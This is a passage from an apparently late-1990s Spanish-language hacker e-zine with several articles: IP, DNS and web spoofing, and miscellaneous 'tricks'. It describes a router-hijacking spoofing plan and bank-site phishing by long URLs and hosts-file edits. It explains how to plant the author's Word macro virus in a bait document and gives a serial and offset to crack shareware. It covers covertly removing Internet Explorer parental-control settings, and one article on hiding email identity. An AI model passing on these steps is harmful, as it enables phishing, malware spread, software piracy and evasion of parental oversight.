traves de Inet y se daran cuenta ;)... )


Spoffing
========

        Bueno  esta  tecnica  tambien  es  muy  conocida.  Spoofing significa
        falsear informacion y hacer creer a la vicitma que  somos  una makina
        de confianza. Existen varias formas de spoffing y tratare de graficar
        las mas comunes.


** IP SPOFFING **

El  ip  spoffing  consiste  en  cambiar nuestra direccion ip o mas bien dicho
hacer creer a otra makina que tenemos  otra  direccion  ip, esto  sirve  para
tener acceso a zonas restringidas por direcciones ip .

Ejemplo de IP Spoffing:


                         ############
                         #  Server  #  # Servidor que confia en
                         #          #    IP 192.0.0.1, archivo Host.equiv
                         ############
                               
                               
                               
              #######                 ######
              #     #>>>>>>>   >>>>>>>#    # Makina 192.0.0.1
              #######                   ######
               Hacker # IP 10.0.0.1
                        False ip maquerading 192.0.0.1

En  este  caso  el Server  confia en 192.0.0.1 y si falseamo la ip de nuestro
sistema podriamos entrar al server remoto sin claves con el comando RLOGIN !!

IDEA TEORICA:

Normalmente los que norman las direcciones Ips en Inet son los famoso routers
es asi que se me ocurre una idea  facil  de hacer  Spoffing, pero solo es una
ocurrencia que tendre que probar, pero teoricamente  deberia  funcionar.  Por
ejemplo.   Pensemos  que  tenemos  un  enlace  a  INTERNET  al  cual  podemos
instalarle un ROUTER. Tenemos  que  la  victima  confia  en  la  direccion IP
192.0.0.1 entonces configuramos el router con una ip valida para  internet en
la  interface  que  corresponde  y  configuramos  otra  interface para la red
192.0.0.0. tratamos  de bajar el router que una la verdadera  red  192.0.0.0,
esto se podria hacer entrando al router y bajando la interface o saturando el
canal de comunicacion  del  router,  una  vez  que este este fuera de la red,
subimos la interface de nuestro router que apunta a  la  red  192.0.0.0  y le
conectamos  una makina con direccion ip 192.0.0.1, habilitamos los protocolos
IGRP y RIP para  propagar  la  nueva  tabla  de  ruteo,  esperamos  un tiempo
razonable para actualizar las rutas y nos conectamos a la victima.



                         ############
                         #  Server  #  # Servidor que confia en
                         #          #    IP 192.0.0.1, archivo Host.equiv
                         ############
                               
                               
                    IP ISP        Ip ISP
              #######                 ######
 Router Hacker# RH  #>>>>>>>   >>>>>>># RV # Router original red 192.0.0.0
              #######                   ######
                 
                 
              #######
              #     # makina hacker con ip 192.0.0.1
              #######


Este sistema no serviria si la el server se encontrara en la misma red  de la
ip que queremos spoffear, por dos razones .

1. El router verdadero RV tendria que bajarse o sea no tendriamos como llegar
al server .
2. El  router  nuestro  nos devolveria  el paquete a nuestra misma red ya que
reconce la red 192.0.0.0 en nuestro segmento.

A este ataque le llamo #### no sep se me ocurrio hace un tiempo pero jamas lo
he probado ###  XDD.

Normalmente el  Ip  spoofing  se hace falseando la informcion de los paquetes
IPS no es tan simple como cambiarse  la  ip,  ya  que  los paquetes jamas nos
llegarian de vuelta, no creen ? ..

Bueno  este  es solo una manera de hacer spoffing, pero existen muchas formas
de hacerlo, por  ejemplo  usar condones en IRC o para hackear makinas remotas
tambien se podrian denominar como IP SPOFFING.

DNS SPOFFING
))))))))))))

       El dns spoffing consiste en lo mismo que ip spoffing con la diferencia
       que  hay  sistemas  que confian en dominio y no en ips ... por ejemplo
       en nombre de makinas  como lo seria makina.cl, entonces lo que tenemos
       que hacer es cambiar el  dominio  de  nuestra  makina para poder tener
       acceso  a  esos  sistemas.  Como  hacerlo,  pues hay programas que son
       capaces  de hacerlo. Aunque hay formas mas complicadas pero efectivas,
       como seria  cambiar  la informacion DNS de un subdominio de un dominio
       maestro ya que este cambio  puede  afectar  al DNS MAESTRO. Hagamos un
       ejemplo.

       La  maquina  a  la cual se quiere entrar esta en el dominio victima.cl
       y la makina en la  cual  confia  esta  en la tabla host del master DNS
       de este dominio y el nombre de makina es  guest.  si  tenemos acceso a
       un subdominio como por ejemplo dpto.victima.cl y agragamos  un  nombre
       de  host  guest  apuntando  a nuestra direccion IP, este cambio podria
       replicarse en el dominio maestro,  dando  asi la posibilidad de entrar
       al server victima ya que pensaria que nosotros somos el host guest.

       Cuando  hablo  de  nombre  de  makina  me refiero a registros A en DNS
       aunque  podriamos  jugar  con  unos  cname  que tambien es interesante
       pero  te  recominedo algo .... leete un manual de  DNS ... yo  me  lei
       el pa LINUX  y  me  cai  en en named.conf XDDD me lo tuvo que arreglar
       DEaTH_BOT XDD.... y seguro se te ocurren algunas ideas.


WEB SPOFFING
============

       Esta tecnica no es muy conocida pero es muy facil de realizar.

       Se trata de suplantar un sitio web,  haciendo  pensar a la victima que
       somos la pagina en la cual confia. Por ejemplo si una persona quisiera
       entrar en www.banco.com, nosotros podriamos entrar a un portal X donde
       www.banco.com tiene un banner, entonces que tan  dificil seria cambiar
       el link de ese banner a una pagina que tenemos en nuestro server.

       Entonces   en   nustro   server  creamos  una  url  tan  larga  estilo
       http://www.miserver.com/etc-............................/www.banco.com
       Donde www.banco.com seria  un directorio mas, entonces la victima vera
       en la url de su explorador el www.banco.com, y sas!!! el usuario crera
       que esta en el banco he ingresara claves y cosas  por  el estilo. Otra
       forma seria metiendose al archivo host de un usuario por ejemplo.

       host file

       10.0.0.1     www.banco.com

       Siendo 10.0.0.1 un servidor nuestro, hay otras formas  de  hacer  este
       ataque  como  cambiando  las  direcciones  IPS  de los caches de algun
       servidor dns, a traves de tablas estaticas en los routers, etc...


Bueno  eso  es  todo  por este numero en Proyecto_R 8 seguimos con la secuela
de este articulillo ..


Comentarios, correciones, ideas, sugerencias a


 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

Mala Ondas a /dev/null


PlaXiuS

CDLR
Pro Hackers Domain


"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*

05. ___________________________________________________________ Trucos Varios 
                                                                By Jiuster


APORTE PERUANO               Por Jiuster Vela             
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

1.      Ftp
2.      Doskey
3.      Jiuster  "El primer, MakVir Visual es lo que creo"


------------------------------------FTP--------------------------------------
He  escuchado,  leido.  pero  nadie  habla, escribe, de una forma sencilla de 
obtener ayuda sobre Ftp (O quizas hay alguien que ya lo hixo..no lo se ) osea 
presionando FTP/?. (Pero no sale nada). 

* Ftp>Get Help //Ya es conocida solo  se  digita el comando y seguido de HELP
Este Pongo como conocimiento por que hay tipos que saben poco o no saben nada
........

Aqui va el truco

Ingresamos a MSDOS, entorno WinDown , sin ingresar a FTP

C:\FTP  jiuster vela

Donde JIUSTER es cualquier caracter 
Donde VELA es cualquier caracter 
Tienen que ser separados

C:\Ftp peru chile        *****Y te sale lo de abajo******

Transfiere  archivos a y desde equipos ejecutando un servicio servidor de FTP 
(A veces llamado demonio). FTP puede ejecutarse interactivamente.

FTP [ -v] [ -d] [ -i] [ -n] [ -g] [ -s:filename] [ -a] [ -w:windowsize] 
[ host]

-v      Suprime  la  presentacion  de  las  respuestas  del  servidor  remoto
-n      Suprime  el  inicio  de  sesion  automatico  cuando  se  establece la 
	conexion

-i      Desactiva   las   peticiones   interactivas   de   datos  durante  la 
	trasnferencia de multiples archivos

-d      Activa la depuracion (debugging)
-g      Desactiva  el  uso  de  comodines  en  nombres  de archivo (Ver GLOB)

-s:Filename     Especifica  un  archivo de texto que contiene comandos de Ftp

-a      Use  cualquier  interfaz  local  cuando vincule una conexion de datos
-A      Inicio de sesion anonima 

- w:windowsize  Sobreescribe  el  tama~o  de  4096  el bufer de transferencia
	predeterminado

Host    Todo el mundo lo sabe

----------///     -n   -A  estas dos son las que mas utilizo\\--------------

------------------------------------DosKey-----------------------------------

Es  es un programin  que se carga de la forma siguiente en el AutoExec.Bat, y
registra  las teclas presionadas Muy peligroso, si eres muy hermetico como yo 
y que no sepen nada de ti o lo que tu hayas digitado.

Si todavia  no lo cargaste en Autoexec.Bat aqui van las lineas, el archivo se 
esconde en C:\windows\command

@ECHO OFF
PROMPT Jiuster+Vela $p$g                  *Cambia el texto x lo ke quieras y 
						 veras cuando iniciesDOS*
LH /L:1,16480 C:\WINDOWS\COMMAND\doskey   *Forma de cargar el DosKey***
cls                    *Limpiar el texto que aparece al iniciar DOS*
path C:\WINDOWS;C:\WINDOWS\COMMAND
SET PATH=C:\WINDOWS;C:\WINDOWS\COMMAND
mode con codepage prepare=((850) C:\WINDOWS\COMMAND\ega.cpi)
mode con codepage select=850
keyb sp,,C:\WINDOWS\COMMAND\keyboard.sys

Ejemplo.

C:\Jiuster
C:\Seli
C:\asd
C: 23 32
C:\te amo sely

Al estar cargado el DosKey. Todo lo que digite se guarda el memoria y aparece 
presionando  las  teclas  de  Direccion  (Flechas) o  mejor Presionado F7. Es 
terrible si has digitado Password, sabiendo que no  eres la unica persona que 
utilizara la Maquina. Para borrar esto Presione 

Alt+F7...>en DOS

Y asi se borraran todas las teclas que digitaste.

Esta  sencilla  combinacion  de  Teclas  no  aparece  con el comando de ayuda 
DosKey/?. Lo obtuve haciendo Debug

-----------------------------------MakVirus----------------------------------

NOTA>  ESTE VIRUS DESACTIVA TODO METODO DE VISUALIZACION DE CODIGO, POR PARTE 
DEL USUARIO NOVATO.

Dentro de JVisual.Zip esta

Jiuster.bas     ***Codigo
Jiuster4.Frm    ***Formulario,  tambien  pueden  usar  Visual  Basic 5.0 para 
			 mirar los efectos esta bacan 
Jiuster4.frx,   ***Es  parte  de  Jiuster4.Frm, no  lo  borres  o  no  podras 
			 instalarlo


**Este virus contiene rutinas de Visual Basic**

=Modo de instalarlo en Un Documento de Word y Modificarlo a gusto:

Crea un documento, nombralo con un nombre Bacan, como carnada. Ahora vete a :

Herramientas/Macros/Editor de Visual Basic

Automaticamente  te  situaras  en Explorador del proyecto, Ubicate abajo. Hax 
click en en el lado derecho del mouse (Saben a mi siempre me ha confundido el 
lado derecho con el izquierdo...).  Te  saldra  Menu  contextual,  ubicate en 
IMPORTAR  ARCHIVO, (Ubicate  el  archivo  e  importalo),  Si primero instalas 
Jiuster4.Frm.  Se  ubicara  en  una  carpeta   de  nombre  Formularios, si es 
Jiuster.Bas, se instalara en Modulo. Ahora Jiuster.Frx no te  sirve para nada 
solo es un enlace, pero no lo borres antes de instalarlo....Si lo entendiste.

Tienes mi correo 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

Ahora  a  modificar  se  ha dicho....Recuerda no sukestimez el lado oscuro de 
mente, puedes hacer maravillas.

-Un maldito antivirus peruano Bautizo a mi creacion con un nombre patetico...
ya vere como los jodo..

Quisiera que me envien Mail  para asegurarme que llego a buen recaudo, espero 
tambien algo (sobre este tipo)  BlackViruZ. Con la informacion que ustedes me 
envian sacare mis conclusiones.

Por el momento 2

- BlackViruz. es un suplantador de 2 Hackers de la INDIA, que pena
- Creo que es estudiante de un instituto. Que tambien es mi instituto


Bueno ya tienen a un amigo peruano, disculpen por no avisar de mi llegada

*Saben  estoy  sobre  la  hora  en  otro Mail envio la forma de desactivar el 
bendito virus abriendo el documento sin correr el riesgo de activarlo. Porque 
ya es hora para ir a instituto.

*Espero  que  mi  aporte sobre Ftp, Doskey, MacroVirus, y los demas virus que 
les enviare, sea Bacan y asi yo me aliente para futuras colaboraciones...

Bueno se Despide Jiuster Vela

    [Tkr: Gracias  a Jiuster por su aporte, y espero que sigas trabajando con 
    nosotros en esta  edicion he incluido el archivo Jvisual.zip que contiene 
    los archivos que  describia  Jiuster,  pero  he  eliminado el .doc porque 
    contenia macrovirus y prefiero evitar mails diciendo: oye pelotudo, habia 
    un  archivo  que cuando  lo abri me jodio to' el disco....!!!,  de  todas 
    formas, ahi esta el Codigo  por  si  lo  quieren probar.Y lo envio con mi 
    firma PGP para que verifiquen, cosa que  nos  se los hayan cambiado en el 
    camino.]

*** VISUALIZAR LAS  CONTRASENAS DE RECURSOS COMPARTIDOS EN WINDOWS 9x

Por defecto las contrasenas para carpetas o impresoras compartidas en windows 
95 son visualizadas con asteriscos.

Para  visualizar  los  caracteres propios de la contrase~a y no asterisco, se 
deben seguir los pasos siguientes:

A) Si no tienes instalado  el  Editor  de  Planes  del sistema (POLEDIT.EXE), 
habra que primero instalarlo, pues sera necesario con los pasos siguientes:

B) En el Panel de Control, ejecutar el icono "Agregar o quitar programas".

C) En  la  pesta~a "Instalacion de windows", seleccionar "Accesorios" y hacer 
click en el boton "Utilizar disco"

D) En  la  siguiente  ventana,  hacer  click en el boton " Examinar" y buscar
la ruta siguiente, suponiendo que nuestro CD-Rom esta en D:

D:\ADMIN\APPTOOLS\POLEDIT

E) Apareceran dos ficheros con extensiones .INF en la ventana de "Abrir" solo
tenemos que hacer click en el boton "Aceptar" por dos veces.

F) Finalmente,  apareceran  dos  casillas o check box a seleccionar, llamadas 
"Editor de planes de sistema" y "Planes de grupo", se deben seleccionar ambas 
y hacer click en el boton "instalar".

---> Una vez instalado el Editor  de planes de sistema, este se debe ejecutar 
(Boton inicio, Ejecutar, teclear POLEDIT como fichero a ejecutar)<---


(*) En el menu archivo, seleccionar Abrir Registro
(**) Hacer doble clic sobre el icono "PC Local".
(***) Hacer clic en Red, despues en  Contrase~as  y finalmente, hacer clic en
      la casilla o check box.
(****) Ocultar   contrase~as   compartidas   con  asteriscos"  para   dejarla 
       deshabilitada (en blanco).
(*****) Hacer clic en "Aceptar", cerrar el POLEDIT, guardar los cambios en el 
	Registro (Nos pide confirmacion) y reiniciar windows 9x


********TFINGER-CRACK


El  siguiente  programa  es  Finger.exe,  bonito  programa para un centinela.
(Total Finger), interesante programa por que se puede  hacer multiple finger, 
tambien registra en un archivo tu trabajo.

Para  ver si el programa tiene algo con el timer, lo puse  hasta  en  el  a~o 
3245,  resultado  no paso nada, con esto yo espere algun aviso de advertencia 
de parte del programa. pero nada.

Despues pense que talvez,  por  limite  de  ejecucion,  caducaria. Asi es que 
arranque 500 veces y tampoco paso nada, aunque hay programas  que no llegan a 
ese limite por que simpre se esta comprando otro. si es que lo compran.

Mi  propio  concepto, el  aviso que muestra "Please register soon!",  es solo 
para molestar al usuario, pues a nadie le gusta que sepan que estas usando un 
programa en prueba, mejor es que sepen que te lo has comprado.


Mi segundo concepto es si el  usuario lee "Please register soon!" y todos los 
dias  al acceder al programa, el usuario  pensara  que  pronto  se  caducara, 
entonces pensara en comprarlo, la verdad esto no se caduca.

Si en el  registro  modificas  o eliminas cualquiera de estos 2 registros, el 
programa simplemente sacara el siguiente mensaje. 

"The trial period has ended. Please register tris software"

La  opcion mas segura es no molestar a estos registros, si lo haces te pedira 
que pagues.

[HKEY_CURRENT_USER\Software\MrFrosty\TotalFinger\Register]
@="4u8hƒ„…†‡ˆ‰ŠD=G?BKLL“”•–PISKNWXXŸ ¡¢U¤¥¦§[][`^^aikl²³´µllnm®£¼½¾¿ÀÁÂÃ"


[HKEY_LOCAL_MACHINE\Software\Clients\HTML\FngReg]
@="4u8hƒ„…†‡ˆ‰ŠD=G?BKLL“”•–PISKNWXXŸ ¡¢U¤¥¦§[][`^^aikl²³´µllnm®£¼½¾¿ÀÁÂÃ"


Ahora si quieres no ver nunca mas este mensaje "Please register soon!" y todo 
lo demas. has lo siguiente:

Una vez ejecutado el programa. Ubicate en menu HELP/Register...
Encontraras lo siguiente:

Name:      (Aqui digita lo que quieras)
Company:   (Aqui tambien)
Serial ID: (Aqui  no digites cualquier cosa digita esto--->(1), si amigo dije
            UNO, formato numerico, por si las dudas). 

Cuando llenes el  formulario,  te pedira  nuevamente  que  llenes, despues no 
volveras a verlo.

Mi  herramienta  (Cgmain.Exe), despues  me  di  cuenta  que  no era necesario 
usarla, bastaba hacerlo con un simple debugger.

El password en el programa forniqueado, se encuentra en la posicion (denomino 
posicion a lo siguiente).

Offset Dec: 572480
Hex: 8BC40

El  password  no  esta  encriptado  ni  nada  por el estilo, se puede ver con 
nuestros propios ojos. Esta con el formato=(31) que es igual a 1.

Estos tipos son reaalmente desatrosos para encriptar sus programas

Si  asi  de  facil  es  este programa, ya me imagino  como  seran  sus  demas 
programas, que ellos crean mas importantes.

Aqui tienes la empresa creo que dice se~or frosty:
(Http:///www.mrfrosty.co.uk/mrfrosty) 

Realmente quien es due~o  de esta empresita debe trabajar solo, digo solo por 
que si seria mas oculta, etc.. y uno sabe que trabajar solo conlleva a muchas 
deficiencias, mejor es en equipo.

Si gusta yo te consigo el programa.


 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

De interes:

Segun mis limitadas investigaciones el siguiente programa (wwwhack), que esta
disponible en la mayoria de Page,  es  un  autentico  troyano,  y  ellos unos 
piratas,  si  no  me creen utilizen un programa debug, con solo mirar,  cosas 
como programas, cokies, logs, messages,..., hasta direcciones como Warez, que 
no se que tienen  que  ver.  No  solo  es  bajarlo y usarlo, esto es como una 
prostituta, con enfermedad, que te contagia,  y  tu  ni  sabes. hay  que  ser 
precavido, con relacion a la chica, pues usar preservativo.

Por  eso  antes  de  utilizar  un programa bajado del planeta virtual hago lo 
siguiente (analizo, comparo,..., mas  que  todo  lo pruebo en una 486, en una 
portatil de poca inportancia, en informacion,...). Lo hago por experiencia.

*****************************************

CYBERKIT (Su nombre lo dice. KIT)

Navegando  y  navegando, encontre varios programas. Interesante. Interesante, 
solo  para  los  que  usan  Windows 9x. NT (Tendran  la  sensacion  de Unix o 
Torval ...) Viene con ejemplos (que mas quieren)

Ya  no tendras que ir a ventana de MS-DOS. luego digitar Telnet, Route, Ping, 
y otros...estos privilegios mayormente se encuentran en S.O. conocidos.

Pero  no seas begin por no decir Lxxxr, para jugar con esto, tienes que tomar 
tus precauciones.

El programa contiene...

1.- Ping
2.- TraceRoute
3.- Finger
3.- Whois
4.- NS LookUp
5.- QoD
6.- Time
7.- DBScanner

Y algo con E.Mail

Toda una maravilla, no tanto...

Homepage
http://www.ping.be/cyberkit

Si  no  puedes  conseguirte  uno, solo dispara un e.mail (Dije e.mail) que lo 
tienes al final...talvez  pueda conseguirlo por ti ;-).

*************

ASESOR DE CONTENIDO

Si te aparecio un Mensaje  como  este "ASESOR DE CONTENIDO: FALTA INFORMACION 
DE CONFIGURACION PARA ASESOR DE CONTENIDO.
ALGUIEN  PUEDE  HABER  INTENTADO   MANIPULARLA. QUIZA   DESEE   COMPROBAR  LA 
CONFIGURACION DE ASESOR DE CONTENIDO.". 
O  algo  parecido  y  te  impide  ingresar  a  internet o te impide modificar 
CONTENIDO (Niveles de seguridad), aqui tienes  la  tecnica para reirte de Bil 
Gato.  Lamentablemente  nada  es perfecto. solo DIOS, alla con ellos yo no me 
trago ese cuento.

Es  lo que todos estaban esperando, pues aqui lo tienes, cuando ensene esto a 
mi primo  se  alegro, no  saben por  que, por  que ahora podra ver su paginas 
pornos, que hace meses sus padres censuraron, y yo  que  pense que alegro por 
algo mas importante, como yo. Pero recuerda si tienes o han  instalado  en tu 
maquina   un  programa  Censurador  o  en  donde  sea,  un  programa  extrano 
simplemente presiona CTRL+ALT+SUP, y busca al extra~o y quitalo, pero sigamos 
con el Asesor de Contenido.

------------------------------Aqui lo tienes---------------------------------

(a)Menu Inicio/Ejecutar
Digite "Regedit"
Preferible Menu Inicio/Programas/MSDOS
C:\Windows\
Digite "Regedit"

Para  hacer  esto  en  mi  trabajo,  hasta  tengo  que  hacer  lo   siguiente
Activo el Programa CAD (AutoCAD 14), en el Prompt,  que  normalmente  aparece 
"Command..." Digito SHELL y al momento  aparece  OS  Command..., donde digito 
REGEDIT, pero dejemos esto y sigamos...

(b) Busca la siguiente linea
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/Ratings

Encontraras(2 cositas :-)))

Ejemplo (El valor Key es solo ejemplo)

- Predeterminado (Valor no establecido)
- Key (f7 33 h94 56 k9 53 k0 39 k4 j8 0j 39 72 f84 s4)

(c) Borra el valor "Key" deja si quieres a Predeterminado

(d) Ahora ubica Ratings.Pol
C:\Windows\System\Ratings.Pol
Borralo

(e) Reinicia tu PC

(f) Despues de Reiniciar dirigite a IExplorer.Exe (Browser)
Ver/Opciones de Internet/Contenido
Veras que todo esta normal,  ahora  crea tu propia contrasena y modifica a tu 
gusto.

--------------------------Aqui va lo interesante-----------------------------

Esta tecnica es  para  pasarte esos 2 problemas que despues lo restauraremos, 
para que nadie se de cuenta.

(a) Haste copia de del valor Ratings
Preferible Menu Inicio/Programas/MSDOS
C:\Windows\
Digite "Regedit"
Dirigite al ultimo valor de la siguiente cadena

HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/Ratings

Ubicate en el  SubDirectorio  Ratings.  Ahora  vete al Menu Registro/Exportar 
archivo del Registro nombralo como Ratings y exportalo  al  Directorio que te 
de la gana o al Diskette.

(b) Ahora ubica Ratings.Pol
C:\Windows\System\Ratings.Pol
Tambien haste copia

(c)Ahora para pasarte el problema  Borra  el  valor  de  Regedit  (Key), y el 
archivo (Ratings.Pol) en el dir System 

Recomendacion: No elimines  solo a uno, me refiero a Ratings en el registro o 
Ratings.pol en System, elimina los dos.

Para restaurar todo  simplemente copia Ratings.Pol a su dir de origen, y para 
restaurar  el  valor  (Key), simplemente has Doble Clic en el archivo que has 
exportado (Ratings.Reg).

Y asi no sabran que has ingresado.


 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*


06. _____________________________ Identificar y ocultar identidad en el Email
                                  By CHack


A  muchos  preocupa  el  anonimato  del  email;  y no  es  para menos, ya que
con  el  simple  hecho  de  verificar  las  propiedades  de  los  mensajes es
suficiente  para  conocer  alguna  informacion  que  puede   delatar  nuestra
personalidad secreta :).

Es  necesario   aclarar,   que   este   articulo  no  esta  orientado  a esas
personas  que  ya  han  saboreado  las  mieles   del   hack;   y,  ya  pueden
obtener  cuentas   ajenas  o  conectarse  a  servidores  que  puedan  ocultar
su  informacion.  Este  es  un  articulo   dedicado  a   los   que   como  yo
solo  tienen  (o sufren)  su  Windows  9X  y  el  Outlook  Express  y estamos
muy, pero muy lejos de ser siquiera un aprendiz de hacker.

Pero  bueno;   vamos   por   partes,   primero   vamos  a  analizar  que  tan
susceptibles   somos  de   mostrar   hasta   los   calzones;   perdon   quise 
decir,  que  tan  susceptibles   somos   de   mostrar   nuestra   informacion
sin  que   nos  demos  cuenta,  asi  que  lo primero  es  mandarnos  un  mail
a nosotros mismos y pongamosle de titulo "prueba".

Una  vez  que  hemos recibido el mail, vamos a seleccionarlo y posteriormente 
oprimimos  Archivo/Propiedades/Detalles/Codigo  del  Mensaje  y nos aparecera 
algo parecido a esto: 

(Los  nombres  y  direcciones  reales  fueron  cambiados  para proteger a los 
inocentes ;) como yo...)


Return-Path: <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
Received: from jperez.217.12.111.248 by marte.datanet.com.mx (SMI-8.6/SMI-SVR4)
	id TAB29951; Tue, 17 Aug 1999 19:03:20 -0800
Message-ID: <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
From: "Juan Perez" <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
To: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
Subject: prueba
Date: Tue, 17 Aug 1999 19:12:37 -0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Content-Length: 163
Status:   
Este es un mensaje de prueba

atentamente
El Pantera Azul

 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 


Como se puede apreciar, de entrada podemos ver:

La  linea 1, por la terminacion mx del mail, el sujeto tiene su cuenta con un 
proveedor de Mexico.

La  linea 2, muestra  que  se  esta  enviando  desde una maquina cuyo host es 
jperez y su dominio o mejor dicho su servidor de correo tiene la direccion IP 
217.12.111.248  y  el nombre de ese servidor es  marte.datanet.com.mx (si  no 
entendieron  esto  no  se  preocupen  adelante analizamos que pitos toca todo 
esto)

La  linea 3,  muestra la fecha, hora y diferencia con el horario GMT, que por 
la  diferencia de horas debio ser enviado el mail desde algun lugar de Mexico 
con la hora del pacifico.

La  linea  5,  ha delatado nuestro nombre y direccion email reales (y eso que 
siempre firmaba como "El Pantera Azul"y mi direccion de iname).

La  linea  15,  tambien  ha  mostrado que yo use el Outlook Express v5.0 para 
enviar mi mensaje, aunque siempre hablo mal de Mocosoft.

Como  se  ve el famoso Pantera Azul, no es otro mas que Juan Perez y no es de 
Argentina  como  siempre  presumio,  y  usa el Windows 9X del cual siempre se 
queja.

Pero cual seria el remedio a nuestros pesares, bueno de entrada debemos hacer 
algunas cosas.

Es necesario cambiar los datos Outlook Express, para ello debemos seleccionar 
en  Outlook Herramientas/Cuentas/Propiedades/General y cambiar la informacion 
del usuario anotando:

Nombre: El Pantera Azul
Direccion de Correo: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

Ojo,  inclusive  si no queremos que nos conesten el email podemos escribir en 
Direccion de correo  algun  simbolo  como por ejemplo un punto "." el Outlook 
nos avisara que no es una direccion valida,  pero de todas maneras nos dejara 
enviar correo.

Ahora probemos para ver como queda, volvamos a mandar un mail, pero ahora con 
el nombre de prueba2.


Return-Path: <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
Received: from jperez.217.12.111.248 by marte.datanet.com.mx (SMI-8.6/SMI-SVR4)
	id UAB29958; Tue, 17 Aug 1999 20:33:28 -0800
Message-ID: <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
From: "El Pantera Azul" <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
To: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
Subject: prueba2
Date: Tue, 17 Aug 1999 20:33:28 -0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Content-Length: 163
Status:   
Este es un mensaje con mis datos cambiados



atentamente
El Pantera Azul

 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 


Ya  la  primera  parte ya esta hecha, ya cuando menos no pueden ver todos mis 
datos, o si?

Como  vemos  en las  lineas 1 y 5 ya desaparecio el nombre de Juan Perez pero 
sigue apareciendo el nombre del host y el nombre del servidor de correo, esto 
es en la segunda linea sigue apareciendo jperez que bueno quiza no sea mucho, 
pero vamos a ver; nos  conectamos  mediante Telnet a ese servidor para ver si 
todavia puden conseguir nuestra informacion,  para ello vamos a selecciona en 
la barra de Windows Inicio\Ejecutar y escribimos Telnet, en la ventana que se 
abra seleccionamos Conectar\Sistema Remoto y en  el  cuadro de dialogo que se 
abra escribimos lo siguiente:

Nombre de host: marte.datanet.com.mx 
Puerto: 25

y luego oprimir Conectar, una vez que se realiza la coneccion nos
debe aparecer 

220 marte.datanet.com.mx Sendmail SMI-8.6/SMI-SVR4 ready at Tue, 17 Aug 1999
 21:23:20 -0800

Como  gente  decente  que  somos, debemos saludar al servidor de la siguiente 
manera

Helo marte.datanet.com.mx

A lo cual el servidor nos respondera

250 marte.datanet.com.mx Hello [217.12.111.248], pleased to meet you

Ahora  veamos  si  el servidor  sabe quien es jperez, para ello escribamos el 
siguiente comando

vrfy jperez

A lo cual el servidor nos podra contestar


250 Fin Juan Niceforo Perez del Hoyo <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >                        


Peor se puso la cosa no solo revelo nuestro  nombre  y  direccion email, sino 
que tambien mostro el nombre por  el  cual  nos  hacian bromas en la primaria 
cuando pasaban lista, esto requiere de medidas extremas.

Para poder  modificar  esto,  lo  unico  que se requiere es selecionar el con 
boton  derecho del mouse en el icono de Entorno de Red  propiedades/Protocolo 
TCP/IP/propiedades/Configuracion DNS y finalmente escribir

Host: ElPanteraAzul

despues  de  eso  se  oprime  aceptar  y  hay que tener a la mano el disco de 
Windows  porque  seguramente  lo va a pedir, y  una  vez  terminado  todo  se 
reinicializara  la PC y por fin  podremos  hacer  nuestra  prueba3,  asi  que 
mandemosnos un  ultimo  mail  y cundo lo recibamos veamos sus propiedades que 
deben ser como estas.


Return-Path: <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
Received: from ElPanteraAzul.217.12.111.248 by marte.datanet.com.mx (SMI-8.6/SMI-SVR4)
	id UAB29958; Tue, 17 Aug 1999 22:15:28 -0800
Message-ID: <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
From: "El Pantera Azul" <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
To: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
Subject: prueba3
Date: Tue, 17 Aug 1999 22:15:28 -0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Content-Length: 163
